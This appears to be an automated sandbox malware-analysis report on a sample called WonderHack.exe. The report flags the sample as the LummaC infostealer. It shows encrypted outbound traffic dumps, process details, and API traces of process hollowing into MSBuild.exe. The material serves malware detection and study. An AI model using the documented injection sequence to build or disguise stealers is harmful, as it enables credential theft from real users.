                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 01 16 88 04 b0 1b b7 69 2a 8d 76 68 07 ac 98 b3 d9 57 69 17 81 8d 56 d4 ca 7e e8 31 ea 9d 76 66 e7 13 97 58 15 a4 d7 55 bf fd 7f 1b 8c 90 cb 35 40 ff d0 0a 66 70 20 c6 84 9a cb 46 0a 4e 10 88 30 0d 6b 8d d1 58 8f 78 56 1e c5 53 04 b5 b9 9b 12 78 30 12 de e2 a1 d8 b7 59 42 cc 83 92 dd 02 c0 26 31 dd de 0d 07 1a e5 16 ae 98 a0 a3 44 9e db 97 40 b2 ca 30 55 64 bb 48 83 e6 bd f1 29 25 24 f6 8b 31 4b a8 43 92 ee b0 09 45 0e 0e c4 bf fc 3d ae cc 9d d0 8c a3 56 9a c9 a8 f7 c3 d2 5d 45 c0 d2 85 3b 59 54 8c 29 3c 8f 99 a3 a4 6e 35 fa 3a cb b1 eb 1c 08 9b c4 15 b9 ea 8d 3a 93 11 1f 5b 69 2a 99 99 81 85 c5 97 35 a6 de 2e 01 ef 3d 34 2d b4 3f 1f 98 fc 89 5e d8 20 04 18 3d 30 0f 2c 92 b3 86 c8 23 75 35 5f 13 bf 72 47 8c 5d df f5 93 78 e7 df 27 68 f0 c4 a2 b6 3e 08 26
                                                                                                                                                                                                                                                                        Data Ascii: i*vhWiV~1vfXU5@fp FN0kXxVSx0YB&1D@0UdH)%$1KCE=V]E;YT)<n5::[i*5.=4-?^ =0,#u5_rG]x'h>&
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: f8 0f 41 7f db 7a a1 e6 12 ac a1 21 7d 32 52 7e a4 3a 06 2c a5 d0 88 c3 d2 43 e9 66 77 65 8e c2 6b c6 a1 66 b1 44 4f 1c 19 b3 a0 73 bd f1 93 de 4c 98 52 9b 19 ec df 62 14 b5 f2 1d 1b e5 e9 bd e1 31 40 b2 67 fc 14 3d 69 ed 2a 13 e4 bd 87 3c 37 f4 34 82 fc 53 c0 ce 93 5f 35 5b 69 23 c3 d3 62 7c 7b c8 f8 a5 a5 45 88 a3 00 fe 00 e7 b9 e4 f6 a9 57 cd 5f e4 18 b0 bf d7 7c 4f 4f d0 d4 cc b9 c8 8c b9 8f 9a 48 bc 3f 29 dd f1 3b 1e 45 6c 7e 56 fd 73 bd 49 8a a1 cc 69 bb 43 34 0b fc b1 d6 78 96 80 aa fd cb b6 f9 ab 62 7d e0 5e f6 70 aa d3 2a 69 a4 01 35 76 19 58 44 53 f1 33 f8 65 c9 5f 45 c4 33 4e f6 33 f2 43 0a 69 56 d4 6c 38 7e 30 9a f5 c0 83 a6 82 aa 31 8a f0 be ea b9 85 1f bb 9c df aa 0d 7a a5 42 a5 17 2f 64 bb 2a 56 5f 9d 3b cc 34 ae ad e6 95 e9 b8 86 32 2d e1
                                                                                                                                                                                                                                                                        Data Ascii: Az!}2R~:,CfwekfDOsLRb1@g=i*<74S_5[i#b|{EW_|OOH?);El~VsIiC4xb}^p*i5vXDS3e_E3N3CiVl8~01zB/d*V_;42-
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: dc 60 1a 2d 08 80 bb 01 25 07 3f f4 2b 70 70 50 fb 61 38 85 d6 d7 1a 91 ee f3 d0 b1 37 2b b3 73 b7 ac 87 a5 85 5b cf 78 33 1d 38 8f 04 bf ab c6 8c 3a 8f fc a3 54 c9 5e 9f ba 34 87 f5 19 a4 dd 6c 1d 32 7b 70 98 7b 77 af 40 9e 2e 02 fb c8 88 c4 75 be cc 50 fb 20 77 94 03 63 a7 41 b6 ee 90 ff 35 61 b0 70 56 10 2c 87 b1 77 02 87 3e 71 3b 63 88 a0 9f c3 aa d9 e7 eb f7 06 9c c5 4c d7 0f 08 39 46 58 6e 84 ec 7a 08 26 76 1c 1b c2 b1 2e 66 fc 6b f7 95 ca 61 d2 57 59 9f 49 1d bd 76 d9 f1 8f 84 d9 c1 d0 d7 44 f2 a4 bf 74 6c 45 f4 01 54 f1 ac 7f ac 9b bc c1 8f 3d 6f 4d f0 85 61 d6 ca 20 99 ac ad 7c f3 9f 8c 37 d2 12 af 72 1f 8d 36 b3 9e c5 b5 df d1 fb 84 ca 3b 21 5f 24 d1 9e f4 45 5d 55 51 6f fe 2e 00 62 70 73 18 71 93 2a 9f e8 1d 7a dc 93 5b 40 13 b0 97 0b 7c 39 82
                                                                                                                                                                                                                                                                        Data Ascii: `-%?+ppPa87+s[x38:T^4l2{p{w@.uP wcA5apV,w>q;cL9FXnz&v.fkaWYIvDtlET=oMa |7r6;!_$E]UQo.bpsq*z[@|9
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: c1 b3 d9 1e 19 e1 1c 8e 2f 0e 2e 78 e6 2f 5f d2 df 11 45 7e ec 8a 2a 34 ce 60 e4 5d c1 dd 49 dc 9d d9 13 bd d4 06 80 80 2c 14 86 8a c8 85 01 de 8c 18 bd 1f 8d 20 32 19 4e 10 73 c3 c9 46 fc 78 5f ff 6b bf 2c 44 be 21 d8 b3 f5 bf 22 e4 ff 75 53 c6 71 8e f2 34 07 40 f9 26 0f 3b cf 9d cd 69 a7 a0 58 e4 cf 0f 1e ce 94 dd cc f3 21 52 6a 1f b6 66 5e e3 05 87 d5 f9 60 04 c8 b8 be a6 43 fa af fd 90 10 8b c7 72 1d dd 6e f5 9b 93 da da 7c fc ed 41 9d 55 c9 99 a0 3c a1 51 2c 38 0b d9 73 01 b3 55 84 96 cb 0d 19 48 99 5e 44 da 87 f3 47 08 4f 5d f3 53 03 ce e8 95 6b 13 bd 95 c8 2d f9 39 14 e8 d2 8b 18 1a 1f 20 b7 5f cc 6c 8c 10 1a 3b 7d 25 0d 92 12 3c 02 e7 58 18 7d 46 d2 15 05 12 fb c3 8f 5e 38 01 aa b9 46 2f f2 dd 83 ee 7a 4a 3c 39 1c 86 0c 13 c5 b9 fe 59 fb 6a 3d 20
                                                                                                                                                                                                                                                                        Data Ascii: /.x/_E~*4`]I, 2NsFx_k,D!"uSq4@&;iX!Rjf^`Crn|AU<Q,8sUH^DGO]Sk-9 _l;}%<X}F^8F/zJ<9Yj=
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 6c 0d 69 cf a9 94 0b 82 75 c2 40 b3 5b 88 14 bf 29 f6 13 d6 e9 f2 c2 65 d6 23 fb e2 ee 35 d9 36 2b e3 fd fb f1 b9 6f 60 49 e7 e4 3d 60 64 0c e0 65 79 a6 bb 35 20 b8 32 b1 fb b7 d3 58 4d a6 44 61 ee 31 58 9c ff 52 ea 7e fc 31 d8 5f a9 14 17 8c 2c 45 6a b3 f4 c3 2a 67 4e 4f 93 2d b1 f3 47 eb 15 b1 4d 8c ec cc d2 78 c0 e3 e4 c4 39 cc 32 42 68 1e c6 5c 7f 76 98 5d a4 e2 a9 e9 cb 39 c1 fe 1e 48 d1 fc 08 da 1a 83 bb 96 9b aa 67 78 f6 2d 99 bf 35 4f 42 e2 11 54 ed 3d 38 5c 92 8a a9 42 7a 98 7e 0b aa 44 a0 61 48 29 60 66 f4 87 2b d7 f1 8c 43 76 48 c6 68 51 92 8e 72 f0 22 a7 88 89 3d 3e 8c e9 8a a1 e2 f7 f6 db 72 c6 a1 5a 85 ca a7 a4 71 3d 18 b4 5b a7 05 e3 b7 3a 69 56 f8 8a 45 fa 93 a8 08 90 f1 f7 b9 bf 44 58 a5 18 10 78 51 1c 0f e1 a9 24 bb 20 65 c7 4f 55 82 a5
                                                                                                                                                                                                                                                                        Data Ascii: liu@[)e#56+o`I=`dey5 2XMDa1XR~1_,Ej*gNO-GMx92Bh\v]9Hgx-5OBT=8\Bz~DaH)`f+CvHhQr"=>rZq=[:iVEDXxQ$ eOU
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 47 be 6c da 1d 54 d9 c1 e3 10 8f 6a 10 cd 61 b8 fd 5b 14 1e b9 58 ae 03 e7 7b 2f 5f 84 cd 10 40 4a a7 2e 37 25 2b 67 7d d2 66 b4 c2 88 b3 13 1d 62 a4 1a 93 2f 21 e5 d8 00 89 4a f9 23 50 fb 49 21 06 db 5f 2f 19 0a 15 dc 7a 1d 4f b3 d5 01 10 27 e1 33 67 b9 2f 37 74 fd bb 7d 82 34 b0 ac 9e 7e cc 0f e6 f4 61 03 4a 20 f8 10 92 02 31 86 a3 44 40 63 11 65 af 6e ef 07 17 72 c9 d2 fb 77 ed 5f 57 ed 1e d8 0d 0f 0d c0 58 03 de ad 67 3c 6a 36 27 00 90 cb 06 4b 51 f2 8f 8d de dd b8 c5 09 74 b9 4a b1 1a 4e 25 81 a2 b4 e1 99 a6 bc 8f 3a 26 24 34 cf 0d 01 af 61 1d 0b 0f 97 d9 8f 5c ec 82 41 af 71 11 d2 62 46 60 74 ea dd d5 f6 bd 71 ea 23 59 72 88 bb 3e 96 d4 8c a0 d6 1f 22 3c 2d bd b2 2f 78 03 56 d5 b3 21 70 2c 8a f2 bf 4e c8 73 72 22 ff bb 8c f4 44 07 0a 92 85 e4 00 ad
                                                                                                                                                                                                                                                                        Data Ascii: GlTja[X{/_@J.7%+g}fb/!J#PI!_/zO'3g/7t}4~aJ 1D@cenrw_WXg<j6'KQtJN%:&$4a\AqbF`tq#Yr>"<-/xV!p,Nsr"D
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 61 39 15 01 b7 0a 6f fc 79 6e b1 3b fc fc 69 60 0e 6a 8b 1e 7e f5 b1 19 55 a5 29 26 1c 50 ef d3 05 46 bf 76 07 ad 04 2c e2 56 75 be 0e 0a 84 84 87 2f 0c 0e f9 20 d8 50 8f 52 69 f1 b2 db 9c 4c 45 19 af c6 27 63 b2 a8 61 ac 9b 92 fa 73 b3 6a 7e 3a 86 c3 74 33 5e bc 38 c5 9c 6e b9 8b 00 c6 26 e9 41 3f 16 af 6f bd 32 e2 45 23 f5 c3 d9 fd 25 5f 33 fb f5 63 b1 07 a8 2a ec b1 c3 e9 a7 3f 32 3d de 87 74 b4 41 b7 37 93 7f 0a 59 b2 66 92 f9 4b de 9b b8 a7 5a 9f 50 a3 df bf fc 68 f8 09 68 a9 3c bc f1 8f dd e3 f4 fc 73 42 ac e1 3d d0 76 76 6f d5 34 9f a2 ec c6 9c e1 86 8c ed 8a 9d 46 81 f9 a2 ee cb ce 8b 4e ab ba 31 dc cd 9c a1 a2 04 d6 96 8e 10 d9 95 74 b8 ea 61 35 e7 0c f4 ca 7f 7d 63 28 e4 0a 38 58 56 dd e6 cd 9e 7e 78 20 b7 a6 73 4d 87 93 57 69 a3 39 32 38 fa e5
                                                                                                                                                                                                                                                                        Data Ascii: a9oyn;i`j~U)&PFv,Vu/ PRiLE'casj~:t3^8n&A?o2E#%_3c*?2=tA7YfKZPhh<sB=vvo4FN1ta5}c(8XV~x sMWi928
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: fa 6d c7 ca a6 3c 16 1f ef 14 06 51 9b 25 9f c2 ed de cd 25 32 12 c7 c4 e7 f4 45 42 d7 38 ce d2 60 dd 4d 1d 10 55 08 cc 89 f5 ac bd b6 6e 02 12 02 08 d9 d3 67 d9 26 7e 50 e9 5d ac cf d3 74 e9 db 0e 96 19 4e d9 46 c2 c2 b0 cd 70 55 54 c8 d9 6f d5 97 1f 28 85 7b 6e 96 24 90 d1 d1 06 3c 31 71 17 93 37 cd 8c 51 61 c6 46 88 1c f6 52 75 0a a6 51 af c0 22 34 e8 a9 fa 66 a3 f6 61 66 93 e0 88 09 c9 5c bb 69 b9 4d 4d 5b 95 91 ca cb 9e a7 12 30 0f b1 05 d2 a1 ee 9f 92 0b 12 75 c0 8c c1 08 a7 82 69 8c 9c 3b 40 36 56 d4 9f 12 b3 44 47 96 61 c4 85 5f 2a c2 b8 cd 76 48 4f ad c0 16 52 e9 0b 4b 5d 93 c9 74 d6 7b af c9 d8 83 6d 1c a5 c4 2f 1f 58 bf 3b 24 26 84 f6 fb 7d a8 03 10 d3 c2 2f 46 7e 4d d4 4e 42 13 e5 91 1d 1d 14 29 17 e2 4f 7a e1 52 dd 41 64 c0 63 c8 aa 31 5b 67
                                                                                                                                                                                                                                                                        Data Ascii: m<Q%%2EB8`MUng&~P]tNFpUTo({n$<1q7QaFRuQ"4faf\iMM[0ui;@6VDGa_*vHORK]t{m/X;$&}/F~MNB)OzRAdc1[g
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 5a 1c 9c 3f 5f 30 18 ec be e4 1b 51 53 3b 3d 7a 72 5c 9f f9 52 f6 89 c2 68 80 df 68 88 8a 70 df 89 a0 fa c8 a7 dc 65 52 88 3e 33 c2 12 19 92 d8 cd e8 1b 5e db 49 63 fa 66 70 22 0e b8 be 6d ac 3d 5f f0 8e a1 1f 52 76 8a 3d b8 e8 7e ab c4 5c f6 b8 c9 97 86 f7 77 b3 6e cd 18 16 04 e0 f3 3a a7 cd 31 0b 9f ec c8 e7 6d 72 13 6a 9e 0a 0e 6d 34 48 0d f7 19 36 b8 e1 17 e6 f1 ac 7b 24 19 3f fb 0a 4b 8b 60 37 7f 58 cb 64 e5 8f 9c da 09 e2 47 3f 43 54 22 43 a3 68 87 50 03 1f b8 09 fd 05 7f 0e fe e7 3e 8b 8d 57 0e 9a f0 78 c7 ca df 26 a7 61 24 64 26 8d 32 0d a0 53 df cf 99 4c b0 b8 86 73 37 92 d9 8b 0a e0 91 c9 d3 dd 21 a2 8a 70 f2 da 4f 40 70 73 18 36 bb db d0 80 86 13 83 8d c6 aa a3 fb 8b 31 7e 5c 25 eb 9a 12 24 26 b8 e7 c9 1a 33 09 f9 10 5c a4 fe aa 5a 6e 96 c0 b2
                                                                                                                                                                                                                                                                        Data Ascii: Z?_0QS;=zr\RhhpeR>3^Icfp"m=_Rv=~\wn:1mrjm4H6{$?K`7XdG?CT"ChP>Wx&a$d&2SLs7!pO@ps61~\%$&3\Zn
2024-12-22 23:49:29 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sun, 22 Dec 2024 23:49:28 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=16j81ge0ni8a8g3k8oov9or7qo; expires=Thu, 17 Apr 2025 17:36:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bg8fXYVtWalfsoLju%2BSA3SaUuDoONQqcAI0cFYNbgiGunm8I2lNBVCRGFeXHubLhuW3Yfee8nGx8reYKpENu7PVQ0ELOlDQKQnDDZpRcJzdmlsW2qteEPagD5rXnAvQ0Umc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6402284e075e65-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1568&rtt_var=604&sent=212&recv=616&lost=0&retrans=0&sent_bytes=2836&recv_bytes=590298&delivery_rate=1787025&cwnd=242&unsent_bytes=0&cid=b0e0e7fe4387bd49&ts=2825&x=0"



Target ID: 0
Start time: 18:48:00
Start date: 22/12/2024
Path: C:\Users\user\Desktop\WonderHack.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\WonderHack.exe"
Imagebase: 0xc90000
File size: 573'952 bytes
MD5 hash: 65FC002AB58B0DC2E95E19B1F308A354
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 18:48:00
Start date: 22/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 18:48:00
Start date: 22/12/2024
Path: C:\Users\user\Desktop\WonderHack.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\WonderHack.exe"
Imagebase: 0xc90000
File size: 573'952 bytes
MD5 hash: 65FC002AB58B0DC2E95E19B1F308A354
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2527201915.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 9.5%
Dynamic/Decrypted Code Coverage: 1.6%
Signature Coverage: 2.9%
Total number of Nodes: 512
Total number of Limit Nodes: 12
29 API calls 21910->21912 21910->21917 21913 cb0313 21911->21913 21914 cb02de 21912->21914 21913->21904 21916 cb0096 _Fputc 66 API calls 21913->21916 21915 cb68c0 __fread_nolock 29 API calls 21914->21915 21915->21917 21916->21913 21917->21899 21917->21909 21918->21883 21919->21883 21923 c997b0 21920->21923 21924 c9989c 21923->21924 21925 c997f4 21923->21925 21926 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21924->21926 21930 c99814 21925->21930 21935 ca7223 RaiseException 21925->21935 21927 c927f3 21926->21927 21927->21835 21936 c998b0 38 API calls std::ios_base::_Init 21930->21936 21931 c9986f 21937 c998f0 31 API calls 2 library calls 21931->21937 21933 c99884 21938 ca7223 RaiseException 21933->21938 21935->21930 21936->21931 21937->21933 21938->21924 21939->21836 21947 ca1680 21940->21947 21945 c94c90 40 API calls 21946 c91c7a 21945->21946 21946->21748 21948 ca16a4 21947->21948 21964 ca16f0 21948->21964 21950 ca16b2 std::ios_base::_Ios_base_dtor 21951 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21950->21951 21952 c92848 21951->21952 21953 ca1580 21952->21953 21954 c947f0 40 API calls 21953->21954 21955 ca15af 21954->21955 21958 ca1430 70 API calls 21955->21958 21963 ca15c2 21955->21963 21956 c94b70 40 API calls 21957 ca1652 21956->21957 21959 c94bc0 40 API calls 21957->21959 21958->21963 21960 ca165d 21959->21960 21961 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21960->21961 21962 c92859 21961->21962 21962->21945 21963->21956 21983 ca2616 21964->21983 21968 ca172a 21969 ca1755 21968->21969 22004 ca1830 68 API calls 2 library calls 21968->22004 21997 ca2647 21969->21997 21972 ca17e0 21973 ca2303 
__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21972->21973 21976 ca17ea 21973->21976 21974 ca1772 21975 ca1780 21974->21975 22005 c94f60 RaiseException Concurrency::cancel_current_task 21974->22005 22006 c94f90 21975->22006 21976->21950 21981 ca17a2 22011 c94fe0 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 21981->22011 21984 ca262c 21983->21984 21985 ca2625 21983->21985 21987 ca1714 21984->21987 22013 ca6708 EnterCriticalSection 21984->22013 22012 caf575 6 API calls 2 library calls 21985->22012 21989 c94d90 21987->21989 21990 c94dee 21989->21990 21991 c94db2 21989->21991 21993 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21990->21993 21992 ca2616 std::_Lockit::_Lockit 7 API calls 21991->21992 21994 c94dc3 21992->21994 21995 c94e00 21993->21995 21996 ca2647 std::_Lockit::~_Lockit 2 API calls 21994->21996 21995->21968 21996->21990 21998 caf583 21997->21998 21999 ca2651 21997->21999 22015 caf55e LeaveCriticalSection 21998->22015 22000 ca2664 21999->22000 22014 ca6716 LeaveCriticalSection 21999->22014 22000->21972 22003 caf58a 22003->21972 22004->21974 22007 c94fc0 22006->22007 22008 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22007->22008 22009 c94fcd 22008->22009 22010 ca26f8 16 API calls 2 library calls 22009->22010 22010->21981 22011->21969 22012->21987 22013->21987 22014->22000 22015->22003 22016->21755 22018 cacb47 22017->22018 22019 cacb35 22017->22019 22029 cacca2 22018->22029 22044 ca64d5 GetModuleHandleW 22019->22044 22023 cacb3a 22023->22018 22045 caca3c GetModuleHandleExW 22023->22045 22024 cac9ce 22024->21655 22028 cacb99 22030 caccae ___scrt_is_nonwritable_in_current_image 22029->22030 22051 caf547 
EnterCriticalSection 22030->22051 22032 caccb8 22052 cacb9f 22032->22052 22034 caccc5 22056 cacce3 22034->22056 22037 cacad7 22061 cacabe 22037->22061 22039 cacae1 22040 cacaf5 22039->22040 22041 cacae5 GetCurrentProcess TerminateProcess 22039->22041 22042 caca3c CallUnexpected 3 API calls 22040->22042 22041->22040 22043 cacafd ExitProcess 22042->22043 22044->22023 22046 caca7b GetProcAddress 22045->22046 22047 caca9c 22045->22047 22046->22047 22048 caca8f 22046->22048 22049 cacaab 22047->22049 22050 cacaa2 FreeLibrary 22047->22050 22048->22047 22049->22018 22050->22049 22051->22032 22053 cacbab ___scrt_is_nonwritable_in_current_image CallUnexpected 22052->22053 22055 cacc0f CallUnexpected 22053->22055 22059 cae86e 14 API calls 3 library calls 22053->22059 22055->22034 22060 caf55e LeaveCriticalSection 22056->22060 22058 cacb7e 22058->22024 22058->22037 22059->22055 22060->22058 22064 cb68fc 22061->22064 22063 cacac3 CallUnexpected 22063->22039 22065 cb690b CallUnexpected 22064->22065 22066 cb6918 22065->22066 22068 cb4077 22065->22068 22066->22063 22071 cb41c4 22068->22071 22072 cb41f4 22071->22072 22075 cb4093 22071->22075 22072->22075 22078 cb40f9 22072->22078 22075->22066 22076 cb420e GetProcAddress 22076->22075 22077 cb421e std::_Locinfo::_Locinfo_dtor 22076->22077 22077->22075 22084 cb410a ___vcrt_FlsSetValue 22078->22084 22079 cb41a0 22079->22075 22079->22076 22080 cb4128 LoadLibraryExW 22081 cb4143 GetLastError 22080->22081 22082 cb41a7 22080->22082 22081->22084 22082->22079 22083 cb41b9 FreeLibrary 22082->22083 22083->22079 22084->22079 22084->22080 22085 cb4176 LoadLibraryExW 22084->22085 22085->22082 22085->22084 22436 c9af30 50 API calls 22438 cb4b37 15 API calls 22336 ca2934 16 API calls 2 library calls

Control-flow Graph

APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00CCF110,00CCF100), ref: 00CCF334
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00CCF347
• Wow64GetThreadContext.KERNEL32(00000094,00000000), ref: 00CCF365
• ReadProcessMemory.KERNELBASE(0000008C,?,00CCF154,00000004,00000000), ref: 00CCF389
• VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 00CCF3B4
• WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 00CCF40C
• WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 00CCF457
• WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 00CCF495
• Wow64SetThreadContext.KERNEL32(00000094,01320000), ref: 00CCF4D1
• ResumeThread.KERNELBASE(00000094), ref: 00CCF4E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2687962208-3857624555
• Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction ID: 60c01acf7334d6dbccf07252e0dbd644d1a8ba4fcbf3070932fc1f88295289c4
• Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction Fuzzy Hash: CEB1F97660064AAFDB60CF58CC80FDA73A5FF88714F158168EA18AB341D774FA52CB94

Control-flow Graph
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,0BDF5ED4,?,00CB4208,00C93E32,?,00000000,?), ref: 00CB41BA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: 26c1a4c0f3027a30b2203c62a0b8baefb936c1634631ecc20d065465bd8806d3
• Instruction ID: e28c7acc859043e82cf6c20a4b612acca1b0639de4cf22b53c8a2067914b7a76
• Opcode Fuzzy Hash: 26c1a4c0f3027a30b2203c62a0b8baefb936c1634631ecc20d065465bd8806d3
• Instruction Fuzzy Hash: 9A21E736E05211ABD7259B69DC44FDE3768DF617A0F240221F926A7292E730EF41C6E0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: File$CloseCreateHandleSize
• String ID:
• API String ID: 1378416451-0
• Opcode ID: ff2df82defd979c00d4827294a6fb9d668e3f65475ca4c3da52d3939b6f7d968
• Instruction ID: a17e3361f0eebdef3af01126ff273547aec2ff77126b8c305540c6c81ef59345
